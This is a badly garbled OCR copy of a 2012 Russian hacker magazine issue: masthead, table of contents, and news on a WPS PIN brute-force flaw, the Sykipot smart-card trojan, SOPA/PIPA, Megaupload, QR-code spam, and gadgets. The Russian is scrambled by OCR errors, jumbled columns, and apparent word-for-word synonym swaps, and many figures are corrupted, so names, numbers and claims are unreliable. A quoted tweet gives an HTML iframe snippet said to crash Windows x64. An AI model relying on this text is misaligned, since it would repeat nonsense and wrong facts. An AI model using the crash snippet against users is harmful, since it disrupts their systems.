Page 0

Исчерпывающий гайд по шоппингу на китайских интернет-магазинах


_.....

-пF.нЕР РЕДАКЦИЯ Главный вычитчик

Микита (<nikitozz)) Кислицин

Шеф-редактор

Степура ((step)) Ильин lstepfareal.xakep.ru ) Николай ((gorl)) Андреев [ gorlumrarea l. xakep . гu l

Выпускающий вычитчик

[nikitoziOreal.xakep ru )

Редакторы рубрик

PC_ZONE равно UNITS

Степура ((step)) Ильин

хакинг

РR-директор

Маг (maggiOreal.xakep.ru ) Андрей ((Andrushock» Матвеев landrushockiOreal.xakep.ru ] Александр «Dr. Кlouniz» Лозовский lalexanderlё!real.xakeo . ru] Николай <<gогi>>Андреев [gorlumffireal.xakep.ru J Анна Г риrорьева [grigorievafaglc.ru ]

Литературный вычитчик

избранная Болотникова

UNIXOIO равным образом SYN/ACK MALWARE КОДИНГ

DVD Выпускающий вычитчик

Антоха с<аnt>>Жуков

Uniх-раздел Security - paздeл

Андреич «Andrushock" Матвеев [andrushockffireal.xakep.ru ) Дмитрий «01g1 >>Евдокимов

Монтаж видео

величайший Трубицын

(antrareal xakep.ru ]

ART Арт-директор

Алик Вайнер 0~1

Дизайнер

земледелец Пономарев

Верстальщик

верование Светлых

Иллюстрация получи и распишись обложке

мужественный защитник Брички н

PUBLISHING Учредитель

000 «Г ей м Лэнд>>, 015280, Москва, 5 этаж, контора N<> 01. Т ел.: (4951935-7034, факс: (4951545-0906

у л. Ленинская Слобода, 09, Омега nлаза,

ПРИВЕТ С АНТАРКТИДЫ

Генеральныйдиректор

относящийся ко Деметре Агарунов

Генеральный владелец

Андрюня Михайлюк

Финансовый начальник

Андрон Фатеркин

Директор согласно маркетингу

Алёна Каркашадзе

Управляющий арт ·директор

Алик Вайнер

Главныйдизайнер

Энди Тернбулл

Директор за nроизводству

Гуля Кучерявый

РАЗМЕЩЕНИЕ РЕКЛАМЫ

Две недели взад получил особенное электронное письмо, которое меняпо-хорошемутронуло равным образом заставило поварить котелком насчёт вечном. Писал

Т ел.: (4951935-7034, факс: (4951545 -0906

РЕКЛАМНЫЙ ОТДЕЛ

СерегаСильнов-редактор рубрики «Фри кинг >>, который-нибудь пока что

Директор груnnы TECHNOLOGY

во прошлом годуотправился во научную экспедицию вднтактиду.

Старшие менеджеры

Письмо отсюда следует особенны м, вследствие этого что такое? отправлено почти не из южного полюса равным образом передано до коротковолновой маза со скоростью бод путем

-50 неком мерческую радиолюбительскую обмет Wl NLl NK.

В письме Сергейка передавал приветы равно рассказывал в отношении своих впе­ чатлениях , которые во таком необычном месте рождаются с самых простых вещей.

Менеджер Директор корпоративной группы Старший менеджер Менеджер Старший трафик·менеджер

Маруся Филатова (filatovaiOglc.гu l Ольга Емельянцева ( olgaemiiOglc . гu l Оксана Алехина falekhinaraglc.rul Елена Поликарпова ( polika r povalё!glc.ru ) [работа со рекламными агентствами] Кристина Т атаренкова [tatarenkovafOglc.ru ] Юлия Г ос подинова f gospoфnova fOglc . ru ] Мария Дубровская (dubгovskayaiOglc гu l Марья Буланова [ bulanovaГclglc:.ru )

ОТДЕЛРЕАЛИЭАЦИИСПЕЦПРОЕКТОВ

Впрочем, все каста романтика была лишь только сопутствующей вещью пользу кого

Директор

Санюша Коренфельд l koгenfeldiOglc. гu l

Сергея, однако возлюбленный приехал тама во составе экспедиции, которая должна

Менеджеры

Светуля Мюллер Наталия Тулинова

была пробурить 0 068 метров льда да серьезно дотян уться до подледного озера Восток, неграмотный навредив ему. Озеро действитель­

РАСПРОСТРАНЕНИЕ

хотя огромное:

Директор сообразно дистрибуции

Кошелева Татиана

Руководитель отдела nодпис ки

Клепикова Викуша Oepikovalё!glc. ru )

050 километров

во длину, 00-в ширин у, да поперед 0.2-в

глубину. Учи тывая , что такое? оно было изолировано через внешнего мира сотни тысяч лет, вопросы об обитающих во этом озере формах жизни и по отношению том, почто не насчет частностей с годами происходит, -ч ертовски интересны: до­ стоверно об этом человечеству ничто безграмотный само на вывеску разумеется . Не что-то около стрела-змея числа

осталось бери планетенеизученных уголков,- равно видишь озерцо Восток являетсяоднимиэтаких объектов.

Какова а была моя радость, нет-нет да и нынче [5 февраля) аз многогрешный прочел но­

[koshelevalaglc.ru l

Руководитель

Лукичева Наталья Hukichevafaglc.ru ]

спецрасnространен равным образом моя особа

Претензии да дополнительная ан фа: В случае возникновения вопросов за качеству печати да ОVО-дисков: claimlё!glc.ru . Горячая графа до подnиске

Факсдля отправки купонов равно квитанций получи новые подписки:

[495] 045-09-06

Телефон отдела подnискидля жителей Москвы: [495) 063-82-77 Т елефон на жителей регионов да на звонков от мобильных телефонов: 0-800-200-3-999

вость по отношению том, что такое? российская поход достигла усик пе ха идоб урила

Дnя nисем:

эту скважину, реализовав проект, длившийся паче

Зарегистрировано во Министерстве Российской Федерации в соответствии с делам nечати, телерадиовещанию

00 лет! Чертов­

ски горд следовать Сергея да его коллег-российских ученых, работающих в этой экспедиции равным образом решившихтакую сложную задачу! Выполняю

его просьбу: передаю приветик во всех отношениях читателям Х не без; Антарктиды : ).

001000, Москва, Главnочтамт, а/я 052, Хакер

равно средствам массовых коммуникаций ПИЯ Отпечатано во тиnографии

07-11802

с 04.02.2002.

Scanweb, Финляндия. Т равным образом ярость 019 033 экземпляров.

Мнение редакции безвыгодный во что-то бы ведь ни стало совпадаете мнением авторов. Все материалы во номере

P.S.

высокочтимый обещал предпринять фотографию от вытоптанным на снегу

держи фоне полярной станции логотипом Хакера. Ждем его возвра­

щения:).

предоставляются что уведомление для размышлению. Лица, использующиеданную информацию в nротивозаконных целях, могут фигурировать nривлечены ко ответственности. Редакция безвыгодный слабит ответ­ ственности из-за тема рекламных объявлений на номере.За nереnечатку наших материалов без спроса- nреследуем.

По воnросам лицензирования равно nолучения nрав для эксплуатация редакционных материалов

nikitozz, rn. ре д. Х shop.glc.ru/xakep vkontakte.ru/xakep mag

ХАКЕР

03/158/2012

журнала обращайтесь объединение адресу: contentragtc.ru .

© 000 «ГеймЛзнд», РФ, 0012

001


Content MEGANEWS

016

Колонка Степы Ильинна

017

Proof-of-concept

О хранении паралей

Все новое после заключительный месячишко

011

hacker tweets Хак-сценавтви ттер е

РЕГУЛЯРНО ПОЛЬЗУЮТСЯ

008

HEADER 004

0АМИЛЛИНОВАМЕРИКАНЦЕВ

ТЕХНОЛОГИЕЙ ОR-КОДОВ

За дач а: составить интересные информация со PasteЬin . com

COVERSTORY

030

Большая охота Интервью из ведущим хед­ хантером рунета

COVERSTORY

COVERSTORY

018

02,

Ломаем Wi-Fi

Расщепляй да

вслед

властвуй

00 часов Получаем WPAключ интересах Wi-Fi от

Уязвимости рас-

через уязви-

са равно внедрения

муж технологии

заголовков на со-

WPS

временном вебе

щепления из-за ошибаться


048

038

PCZONE

-

UNIXOID

В небесная империя следовать покупками?

004

Свободачерезизоляцию

008

Федоринасча ст ье

Из что состоят безопасные Liпuх - дистрибутивы

Семь китайских интернет-магазинов со всякой всячиной

042

Проверка возьми надёжность

Мини-обзор заслуживаю щ их внимания изме н е н ий

Тестируем универсальную распознавалку САР Т СНА

048

Фреймворкдля пентестера

на последних версиях F edoгa

Тестируем тревога веб-приложения вместе с через

01 О

wЗaf

052

Интегрируем Liпux равным образом <<облачные» сервисы

хакинг

-

SYN/ACK

Easy-Hack

014

В поискахинсайдера

020

Корпоративныесвязи

Борьба от утечками корпоративной информа ц ии

Хакерекие секреты простых вещей

056

Достучаться по небес

Обзорэксплоитов

Анализ свеженькихуязвимсетей

Опенсорсные решения на централизованного

062

РНР - кавасаки на

управления доступом для ресурсам

066

0сап сгасk it!

Создаем высокопроизводительный сайт

Решение заданий для того хак-конкурса, учрежденного

из использованием

Windows

Кодим бота с целью распределенных вычислений

024

Испытаниенагрузкой

nginx да Django

Управлением правительстве н утнапиштим сношения

Великобритании

070

Фальшивые

SMS: похудей после 00 дней!

Всяподного т ная известноголохетро н а

074

X-Too ls

-

FERRUM

030

От <<винта » ! Тестирование внешних жесткихдисков со

Программы ради взлома

036

Ed i f i eг

WEXLER.BOOKТ7055

USB 0.0

R2500

Обзор универсальной активной стереосистемы

-

MALWARE

038

076

Веселая тройкабуткитов

-

И шве ц , да жнец, равно сверху дуде игрец со ц ве т ным

Самыетехнологичные угрозы

0011

лета

во веселых картинках

082

Малварьдля мобильных << окошек »

Исследуем фасон безопасности п опулярной ОС д лясмартфоновнапрактике

КОДИНГ 088

Формграббердля

FAQUNIТED

043

Диско

044

0.5 Гб всякой WWW2

Google Chгome

Расширяем потенциал препроцессора С/С++ с помощ ь ю сторо н него кодегенератора

096

0адачинасобеседованиях П одборкаинтересныхзаданий,которыедают на собеседованиях

000

Паттерны проектирования <<Адаптер» равно «Фасад» Меняем равно н терфейсы классов сверх ущерба ради з д оровья

Большой

FAQ всячины

Удобные wеЬ-сервисы

да путь их перехвата на спринклер ре с Google И целого Си недостаточно

юниты

040

Исследуем отправку зашифрованных форм

094

сенсор н ым дисплеем

010

0.0


MEGANEWS НОВАЯ ДЫРКА В WPS ОБЛЕГЧАЕТЗАДАЧУХАКЕРАМ БРУТФОРСИМ ЛЕГКО И БЫСТРО

GOOGLE ОБВИНЯЮТ В НАРУШЕНИИ ШЕСТИ ПАТЕНТОВ. Истцом выстуnает Bг i t i sh

Telecom -одна изо круnне й ших на мире телекоммуникационных комnаний.

ТРОЯ Н ОХОТИТСЯ НА С МАРТ-КАРТЫ ВОЕННЫХ МАЛВАРЬ, ИСПОЛЬЗОВАВШАЯСЯ ДЛЯ АРТ -АТАК,

н

еприя т нуюуязвимостьна­

шел на не без; т андарте

СМЕНИЛА ПРОФИЛЬ

WPS [Wi- Fi

Pгotected Setupl исследо­

ватель во области информационной безопасности Стефан В равно бок, касательно чем и поспе ш равным образом л уве д омить U S-CERТ. Д ырка присутствует на продуктах мно­ гих популярных брендов, на томик числе

0-Link, Netgeaг, Linksys да Buffalo. Она позволяет ощутимо выгнать время,

уходящее получи брутфорс РIN-кода, который необходим интересах установки беспроводного роутера. В результате о ш ибки для атакующему возвращается слишком беда сколько информации об РIN­ коде, а самоуправно некто становится слабее, что никак не г ативно влияет получай защиту

тысяч, кабы неграмотный миллионов

Wi-Fi-

ма ршр у т изаторов равно точек дост упа.

В

а

US-C ERT поясняют: «Если

nроверка

D

троянце

Sykipot, казалось бы,

блистает своим отсутствием нуль особен­

ного- малварь, ориен т ирова нн ая возьми п охищение

данных об смарт-картах, далеко не нова . Но безвыгодный всякий

деньувидишь малварь, окончание которой - смарт-карты

сотрудников Министерства обороны С Ш А равно п олучение с их помо щ ьюнесанкционированного д оступа для что касается г ра­

ниченным ресурсам. Именно т акие модификации во коде

в области д линности РIN-кода завершилась

Sykipot обнаружили специалисты

неуда ч но, след доступа посылает

Одна изо новых функций троянца обеспечи на ает взаимо­

сообще н ие

мера от ПО

EA P-NACK н азад клиенту.

компании

Activ ldentity ActivC ii ent,

AlienVault.

ко через орое равно как однажды

Эти сведения пересылают ся таким

работает со смарт-картами, соо т ветс т вующими ста н дар­

образом,чтохакеруудаетсяопреде­

в дальнейшем безопаснос т равно Минобороны С Ш А. В американском

лить, является ли первая супруга

Минобороны такие карточки использую т ся ради хранения

РI N - ко д а во ер н ой. Пос л едняя циферка

цифровых сертификатов рабо т ников равным образом их РI N-ко д в рассуждении на , nри­

Отметим, в чем дело? ни единовластно

ранее известна, таково в духе возлюбленная являет-

ме н яемыхдля аутентификации. В резул ьт атетехнического

изо производителей,

ся кон т рольной суммой РIN-кода.

анализа специалистам

В се сие зна ч ительно сокращает

небывалый разновидность стих скомпи л ирован е щ е на марте

мости, никак не выпустил

количес т нет слов п опыток, требуемыхдля

так возлюбленный давно этих пор был безграмотный через силу свободно распространен.

ее ремонт .

усnеш н ого брутфорса: что касается н по части снижается

Он станет перехватыватьданные в рассуждении сер т ификатах равно п ри

провиант которых подвержены уязви­

В своей статье Вибок пишет, зачем лучшим

со

способом борьбы

сяч>>. По д робнее об этом твоя милость можешь

димых РIN-кодах. После перехвата

п рочи т ать на одной изо статей рубрики

краденую информацию н а защищенные р есурсы на Китае.

не без; дыркой получай данный моментявляется

отключениеWРS .

00'8 д об 00'3 + 00'4, так кушать вплоть до 01 ты­

AlienVault посчастливилось на ыяснить, что 2011 года,

Соvе г Stогуэтого н омера.

помощи на строенного кейло г гера совлекать дан н ые что касается во на о­

Sykipot переправляет

Э т о, во п рочем, н е говорит по части т ом, который в области л у ч атели истинно н ных тоже находятся во КНР.

@wЗ bdЗvil

<iframe height='18082563'></i causes а BSoD on \vi.n 0 х64 via

Lol!

Yota КОМПАНИЯ <<СКАРТЕЛ>>

ПОРТЫ СТАНДАРТАUSВЗ.О

ПРОИЗВОДИТЕЛЬ LINUX-

СКОРО, наконец, nоявятся

ДИСТРИБУТИВАМАNDRIVА,

WINDOWSPHONE MARKETPLACE nерешагнул

KOMAHДAIPHONE DEV-ТЕАМ,

(БРЕНД УОТА) ЗАПУСТИЛА В НОВОСИБИРСКЕ nервую

получи и распишись смартфонах да nланше-

контролируемый российским

отметкув50тысячnри-

джейлбрейк nод iOS 0.01 чтобы

трал

LTE во России . Сейчас

тах.ПоинформациисСЕS,

фондом

ложений. На сие магазину

iPhone45 да iPad 0. За nервые

ахан включает6З базовые

nроизойдет сие на конце 0012-

провозгласить в отношении банкротстве.

nонадобилось14месяцев

тридняутилитускачало

станции, да ко марту их ранее

го или — или во начале 0013 года.

Увы, ситуация у комnании вовсе

(Andгoid Maгket на свое промежуток времени

побольше одного миллиона

nлохи .

nотребовалось 09).

лицо .

станет150.

001,

NGI, борзо может

наконец-то, выnустила

ХАКЕР

03 /158/ 0012


...;;; N

N

..; ш

u u

~

0-

=il

:J: а..

по части

LO

u :..: < :!Е

х

LO

:!Е L-

:J: ш

:..: :s: а..

LO

~

:J: ш

01ш

а..

~ :s: u

< :!Е ~ :!Е

ш ш а..

:!Е

ш

а а..

0:J:

по части

:..:

g 1:: о

:J: ш

с:

011

относительно

0-

е

. м

:s:

Реклама . Товар произведен на соответствии со Техническим Регламентом для табачную продукцию.

~~dдr~~~~~r~d~~т~~ r~~~~~ ~rrд~~rrжд~rт:

~ ~rt~~t ~rtд~т ~~шtм~ dд~r~~ью


MEGANEWS

03% МИРОВОГО ОБЪЕМА ВЫПУСКА ФЛЭШ-ПАМЯТИ NAND скупила во четвертом квартале прошлого возраст Apple.

ПЛАНШЕТ, ПРИСТАВКА ИЛИ ЧТО-ТО ДРУГОЕ? СМЕЛЫЙ КОНЦЕПТ ОТ RAZER

nредварительно озвученыследую­ щиетехнические ха­

рактеристики : морда

размером 00,1дюйма

да разрешением 0280 х 800 пикселей , много­ канальнаязвуковая

подсистема Dolby

0.11п роектируемая вместесТНХI. сред­ ства беспроводного подключения

Wi-Fi802.11b/g/n и Bluetooth 0.0. Планиру ется вот и все

РАССМОТРЕНИЕSОРА И РIРАОТЛОЖЕНО О МАСШТАБНОЙ ОНЛАЙНОВОЙ АКЦИИ ПРОТЕСТА И ЕЕ РЕЗУЛЬТАТАХ

m

ы еще рассказывали насчёт «чудесны х» американских

зако н по части nр оектах SOPA IStop Online Р iгасу Act] да

PIPA IPROTECT lntellectual Р горегtу Act], nородивших

волну негодования неграмотный токмо возьми Заnаде, только до во всех отношениях у миру. Для

тех. ктоумудрился безвыездно ради nустить. напоминаем: зако нопро ­

екты обязывают всех у ч астни заговор се ти царство безграничных возможностей lпровай деры, хос тинги , п оиско вам е от да из темы равным образом пр.] сообразно первомутребованию правообладателя !без решения суда] отринуть пиратский контент да прекращатьлюбые вза имоотно шения не без; nират­

использоватьаксе­

екими сер во исам и. Платежные системы обязаны отключить

лерометры равно сенсор­

во озможность перев хвала д е н е г, поисковики -удалить ссылки

ный отражатель .

держи сайты да т. д . В случае невыполнения эт ихтребований ты считаешься соучастником да твой сайт могуттакже закрыть без свида равно следствия. Кстати, иностранные сайты, сервера

которых расположены на США. будут поддерживать такую а ответ­ ственность из-за неразрешенный контент, вроде разве бы они бы ли учреждены во Штат ах. Б олее до мельчайших подробностей от законо nроектами и их возможными последствиями позволительно составить себя понятие хо тя

бы во В икипедии, а нас настоящий дни значительнее интересуют n осле д ­ ствия. П оняв, в чем дело? «СО ПАблизка », крупные американские

корnорации ощу т сиречь угрозу интересах себя любимых . За дра ко­ новские распоряжения выступили, ко прообраз у, М РАА, RIAA равным образом альянс BSA !членами которого являются Microsoft, Apple, Adobe, lпt el равным образом т. д.]. Зато наперерез кому/чему выеказались Google. Twitteг, Mozi lla, Facebook, Yahoo, еВ тю-тю равно дру гие представители интернет­

на

м ериканекая шарага Rаzегхорошо известна вот во всех отношениях мире !в томик чис­

индустрии. Чем ближе становился « деньХ », сверху некоторый было

ле да во России] что разработчик периферийных игровых устройств

запланированор искусник смотре ние зако нопроектов на Конгресс~

равно принадлежностей. И нужно заметить, хороших- непостоянно ваш покорнейший слуга п ишу эту но­

тем в большинстве случаев накаляли из ь со тра сти. В осемна дцат ого января

вость, моя хэнд как бы присест лежит получи мышке от былоувидеть

Project Fiоnа-проект,

Razer. Тем

интереснее равным образом неожиданнее

по-над которым во комnании работаютсейчас

да тот или иной был nредставлен возьми выставке

CES 0012.

Эта концеnция nредставляет

во интернете прошла, пожалуй, самая массовая онлайновая акция протеста из-за всё-таки период его су ществования. Англоя­ зычная Википедия nровела самый большой во истории

внешне игровой nланшет, ориентированный возьми игры, сверху иболее nоnулярные сей­

опрос, nодавляющее подавляющая участников ко так рого

часы для ПК. так принимать бери зрелище <<nрожорливые>> да мощ ные . Ус т ройство nланируется

поддержало выключение англоязычного раздела возьми су тки

снастить «интуитивными элементами уnравления» !кнопками да аналоговыми

на мета протеста.

джойстиками] со насильственный обратной связью. Где не кто иной равным образом наравне они будут расnоло ­

свойлоготип черным прямоугольником цензуры . Поддержа­

жены, неплохо следовательно нате иллюстрации. А гла вн ое, основой Pгoject

ли протести во WoгdPгess. В целом ко задел протеста Ыackout

стоить nроцессор lпtel Соге

примкнулитысячи сайтов по мнению всему миру. Н еспадко пришло сь

от нехваткой игр на планшета- мысль заключается во том, зачем на деле однако

равным образом сторонникам SOPA. Та к. виднейший на мире регистратор GoDaddy, nоддерживавший SOPA, подвергся жес т комубой­

Fi ona должен i7 третьего поколения. Заявлено, что-то по части этому вопро­ су пароходство грудь в грудь сотрудничаете lntel. Этот ходдолжен устрани т ь проблему

Reddit приостановил работу. Google прикрыл

существующие зрелище смогут заниматься получи устройстве вне какой-либо nеределки

котуса сторо ны интернет-сообщества: пользователи приня­

иначе доработки. Ты скаже ш ь. чт что касается этотолько концепт. да будешь безграмотный прав. Специа­

ли сь тысячами у вести со вои домены через GoDaddy. Регистратор

листы Rаzегпочти готовы изобразить работающие образцы. Предполагается, почто

оцени л ситуацию да поспешил отказатьс моя персона отсвоих слов,

поставки устройства начнутся уж на четвертом квартале текущего года. Стоить

однако в области зже во опрос TechCrunch шея вместе с нил ось. аюшки?

планшет повинен безграмотный сильнее $1000.

nо-nрежнему поддерживаетSОРА ... В общем , отт ок здание е нов

GoDadd y

продол жается равным образом сейчас. Сдался nоддавлением народного негодования равно организация

ВЗЛОМАН КРУПНЕЙШИЙ ОБУВНОЙ ИНТЕРНЕТ-МАГАЗИН В США.

BSA, заявивший , что-нибудь SOPA «требует доработки ». П отом, уловив тенденцию. «пере д да мозгу мало аль » да сенаторы, ратовавшие

из-за а нт ипиратские законоnроекты. В осем ь американских

законо дате л ейотк а ради лись п оддерживать SOPA nосле

08

ZAPPOS.COM УВЕДОМИЛ 0' МЛН

января равно Ыackout'a, есть такие да совершенно встали получай сторону

КЛИЕНТОВ О ТОМ, ЧТО БД МА­ ГАЗИНА ВЗЛОМАНА И ИНФОР­ МАЦИЯ О НИХ МОГЛА ПОПАСТЬ В РУКИ ХАКЕРОВ

исходно nр е дставивший законоnроектSО РА . отозвал его,

006

протестующих. И который во равно т оге? Конгрессмен Ламар Смит, из­ при знав, что такое? на нынешнем виде положение отнюдь не можетбыть принят.

Рассмотрение зако н оnроек та было отложено.

PIPA nо­

сти гла та но участь. Можно ли бери з вать сие nобедой ? Вряд ли. Л оббисты равным образом копирасты рассержены, н в отношении останав лива ться они несобираются,полагая,чтосенаторов«затерроризировала бло г осфера». Теперьлоббист ы намере ны немножко nересмо­

третья часть n в отношении д шаг ко пробл еме. Звучит зловеще.

ХАКЕР

03/158/2012


0 ФИШЕК

BUFFALO CLOUDSTATION Собственный облачный сервер Buffalo CloudStation- сие не NAS. Хранилище

аллопатический

Удобный бэкап Традиционно с целью решений

nросто

nозволяет

легко и просто вести устраненный дост уn для

данным посредством всемирная сеть nрактически не без; любых

Производительная

устройств: на правах со стационарного комnьютера,

архитектура

беспричинно равно из мобильных девайсов.

Buffalo

бэкаn данных не без; клиентских машин

Несмотря возьми комnактные размеры

орагниэовывается весть nросто. При

[15Dx175x45 ммl , сетевое депо

этом nоддерживается как так да МАС

05.

Windows,

оснащено конец nрои зводитель­

Ус тро йство nоль-

ным но л езом, которое nозволяет никак не

ностью совместимо вместе с эnnловской технологией

исключительно сформировать порывистый сете­ вой достуn ко файлам, однако равно реализо-

Time Machine.

вать часть nолезные функции.

Встроенный

Припожения дпя

BitTorrent-клиeнт

iOS равным образом Android Приложение

Webaccess

Как да значительная современных NAS'oв,

соз­

Buffa lo

оснащен встро­

дадено в целях удаленного дост у nа

CloudStation

вместе с мобильных побег тр ойств для дан­

ен ным ВitТоггеnt-клиентом вместе с

ным, хранящИмся в решениях

удобным wеЬ-интерфейсом.

фирмы

Эту функцию до достоинству

Bu ffalo.

Одновременно

nоддерживается небольшую толику

оценят любители интенсивно­

хра нилищ, а само nриложение

го р2р-обмена: бросать торрен­

умее т подвизаться из файлами во сех nоnулярных форматов: с ви­ део, фотографий равно музыки до раз ноформатны х д окументов.

твоя милость довольно во разы удобней.

Перекодировка

Большой масштаб

медиафайлов

равно энергоэффективность

Bu ffalo CloudStation

умеет автомобиль -

матически кодировать целый виде­ оконтент на нужном размере nри

удаленном достуnе от мобильных устройств. Та ким образом, можно удобно смотреть, наnример, видео получай айфоне, безвыгодный задумываясь

касательно nерекодировке файлов.

Устройство nозволяет разместить в себя одинокий диск от

0 вплоть до 0 Тб.

SATA-11

объемом

Среднее энерго­

n отребление nри этом никак не если т nревышать

06

Вт. При текущих

расценках получи э лектроэнергию , на

година сие nозволяет урезывать себя предварительно

0

тысяч рублей, неравно уподоблять с обычным ПК .

ХАКЕР

03/158/2012

007


MEGANEWS

ИНДОНЕЗИЙСКИЙ ХАКЕР HMEI7 дефейснул моментально цифра доменов верхнего уровня , принадлежащих компании S i emeпs.

QR-КОДЫ МОГУТ БЫТЬ ОПАСНЫ

MEGAUPLOAD

КИБЕРПРЕСТУПНИКАМ ТОЖЕ НРАВЯТСЯ НОВЫЕ ТЕХНОЛОГИИ

ФБРЗАКРЫЛООДИН ИЗ КРУПНЕЙШИХ ФАЙЛООБМЕННИКОВ

по отношению

ВСЕ

пасный случай создан во С Ш А-ФБР закрыло

сам с крупнейших Файлаобменников на силок

Megaupload, генерировавший, no его собствен­ 4% лишь интернет-трафика. Похоже

ным данным, рядом

n

возьми рубрика <<желтой>> новости , но, увы, сие реальность.

рактически всё-таки интересныетехнологические новинки преждевременно сиречь поезд ушел оказываются «на служ­

По запросу американских спецслужб во Н овой Зеландии

бе» у криминала. Н е избежали этой участи равно

да были арестованы зачинатель nроекта Ким

QR-

продаж смартфонов , планшетов равным образом других мобильных

ное закрытие

девайсов.

чество,

Специалисты

Dotcom

Шмитц равным образом пока что три человека. Каждому изо них грозиттюрем­

коды,популярностькоторыхрастетвместесувеличением

Websense ThгeatSeekeг Netwoгk об­

no трем обвинениям: 00 планирование следовать мошенни­ 20 парение следовать замывание денег да по части пятью полет следовать отдельный

дело нарушения копирайта! Помимо этого, выдвинуты

обвинения nротив трех граждан других стран. Эти люд

наружили сп а м-сообщения, ссылающиеся в страницы со вс т роенными QR-кодам и. П касательно всей во идимости, таково со па­

имели позиция ко проектам компании. П об мнению

планы обходят спам-фильтры равно пытаются приказать nоль­

Де n артамента юстиции С Ш А,

зователей приотворять ссылки особенно со через мобиль­

распространению пиратского контента . За высшая отметка планирование рабо­

ных устройств. Сп а м выглядит в качестве кого традиционная голубой яд

твоя милость некто по слухам нанес индустрии развлечений урон во раз­

фар я равно содержитссылку возьми сайт 0tag .nl -

мере $500 млн во виде недоnолученной прибыли . Кроме

на полне легаль­

ный сервис, позволяющий производить QR - ко д ы чтобы

того, файлаобменник породил <<криминальные денежные

URL-

потоки>> !от рекламы равным образом продажи премиум-аккаунтовl насумму$175м л н.

aдpecoв. Как только лишь читатель перехо д равно т п по части ссылке,

получи экране отображается QR-код, а сnрава с него - адрес. Когда nользователь считывает QR-код, его устройство либо механически nереходит no зашифрованному адре­

су, либо сnрашиваету юзера чёткость lв зависимости от версии QR-читалкиl . Эту характерная черта ле г ко дозволяется ис­ пользовать про распространения специфич н ой малвари

посредством уязвимостивмобильных браузерах : однако обы ч но эти коды сканируют в частности со через смартфонов . Увы, этот «виток эволюции>> во атаках для мобильные девайсы предсказывали многие аналитики.

Megaupload сnособствовал

а

Уже nоследовала молчание других ресурсов от аналогич­

Поданным ко омпа­ ни ис оm5соге , 04 м лн амери для анцев

на возрасте с

08

ным функционалом : ко nримеру, прославленный хостинг-сервис

FileSonic объявил по отношению полном

отключении файлаобменного

давно З4л е тр е гулярно

функцианала !составляющего, заметим, его суть) : сейчас

используют

перекачивать контент, света вольного неграмотный видит другими nользователя­

домашние мобильные

у из т ро й ства дл я чтен равным образом мы QR -к одов . А опять-таки ещ е недавно QR- для оды были по­ пулярн ы во осно вн об м

н а Восто ке.

ми, невозможно.

Отреагировала да «сетевая оппозиция>>-Апоnуmоus атаковали сайты ФБР, Минюста США , Белого дома,

RIAA,

М РАА да репертуар прочих организаций, через действий которых был закрыт файлаобменный сервис.

THUNDERBOLTтм

оов

ИНТЕРФЕЙСТНUNDЕRВОLТСКОРОДОБЕРЕТСЯДОПК

РЯДНЕБОЛЬШИХКОММЕРЧЕ­

ANDROIDINVASIONCOCCЫЛKOЙ

HAБAЗEWINDOWS. Этy радостную похоронка сообщаетнам

СКИХ IPV6-CETEЙ пла ниру­

НАПРОГРАММИСТАGООGLЕСО­

выход из печати DigiTime. По информации источника (данные по части ко­

ется составить во Китае

ОБЩАЕТ, который Googl e на со кором

тором отнюдь не раскрываются) , строй << железных » гигантов, таких

для концу201 0 года. А уж

будущем м ожет зачать ваша милость ­

какSопу, Asus, Gigabyte Technologyи ASRock, сейчас боевито

на

спуск м обильны х n р оце не без; сорав

внедряетТhundегЬоlt на домашние nродукты. Новое аппаратное обеспечение

во Поднебесной стандартным

nод от обственнымтов а рны м

надлежит всыпать давно рынка во апрелетекущего лета .

nрото ко олом .

з нако м.

0015 году 0Рv6должен заделаться

ХА КЕ Р

03 / 058/2012


итоги

IGRDUPiB

КОНКУРСА НАСТАЛО ВРЕМЯ ПОДВЕДЕНИЯ ИТОГОВ НАШЕГО КОНКУРСА, КОТОРЫЙ МЫ ПРОВОДИЛИ СОВМЕСТНО С КОМПАНИЕЙ GROUP-IB, СПЕЦИАЛИЭИРУЮЩЕЙСЯ НА РАССЛЕДОВАНИИ ИНЦИДЕНТОВ ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ. Напомним, во рамках соревнования было нуждаться вести изучение одновременно двух !Т-инцидентов: утечки конфиденциальных данных для предприятии, а эдак а взлома сервера сверху базе Liпux.

Победителями конкурса являются [в алфавитном порядке):

КОНСТАНТИН ИЛЬИН

~Еонид WАнин

ст дент 0 курса Физико-технического

Род занятий:

У

института

НТУУ "Киевский политех-

нический институт", Киев.

Комментарии nобедитеnя:

«Конку рс понравился, провед

е н нате высоком техниче­

шил затем рычаги

не без; колтун ~ровне. Прдинятdь уч~~:~и~~сь хорошее впечатле­ с фреимворком

шаг пе,

ние в отношении квалификации организаторов».

К сожале нию, обе щанный вознаграждение [трудоустройство во

Отчеты победителей

Group-IBI отнюдь не подошел ни одному с победителей:

опубликованы получай нашем сайте:

Костюха учится во Киеве равным образом в эту пору безвыгодный может переплыть

www. xakep.ru/post/58241 0

во Москву, а Леонида целиком и полностью усик траивает равным образом текущее место работы . Тем неграмотный менее, в надежде всё-таки было честно, я

награждаем победителей ценными призами: каждый получает в области

iPad 0 Wi-Fi

ЗG

06Gb.

Будь вместе с нами! Стань одним изо нас!


MEGANEWS

FАСЕВООКВЫПУСТИЛ СО6СТВЕННЫЙ МЕССЕДЖЕР к Windows, а ВКонтактетем временем те вместе с тируетсерв да от видеозвонков

ДВАДЦАТЬ СЕМЬ СТЕКЛЯННЫХДЮЙМОВ НОВИНКА ОТ SAMSUNG НА РLS·МАТРИЦЕ

н

а прошед ш ей отнюдь не д авно во Лас-Вегасе выставке

СЕ5

0012 приманка

последние разработки продемон ­

стрировали топо на ые производители <<железа»

со общем мира. Интересного сверху СЕ5было много, да пере­ числить совершенно мы, ко сожалению, малограмотный имеем возможности, беспричинно

зачем придется ограничиться малы м. Одной с самых ярких новинок, пре д ставлен н ых сверху выставке, стал мони т шум

027В970 в отношении т компании 0amsuпg, продолжающий 0-ю премиум - серию. Этот 07-дюймовый прибор интересен

тем , почто спирт работает нате основе технологии PL5 IPiaпe L iпe 5witchingl. П об сути, сие своего рода IP5 lln-Piane 0witchingl oт5amsung . Так равно как I Р5-матрицы для настоящий момент являются <<вершиной трофический цепи», сия старая-новая т ехноло г ия заи н тересовала многих.

П ервый компакт-диск

y5amsung,

однако, вышел комом: двоечка мо­

нитора бери РL5-матрице, представленные во прошлом году, обладали букетом всех возможныхдефектов сборки, были помещены во станина изо д овольнодешевого автопластика да на

результа т е имели засве т ы, битые пиксели равным образом т. п. П охоже, тепер ь 0amsuпg решил а ис пр авить э т с промах.

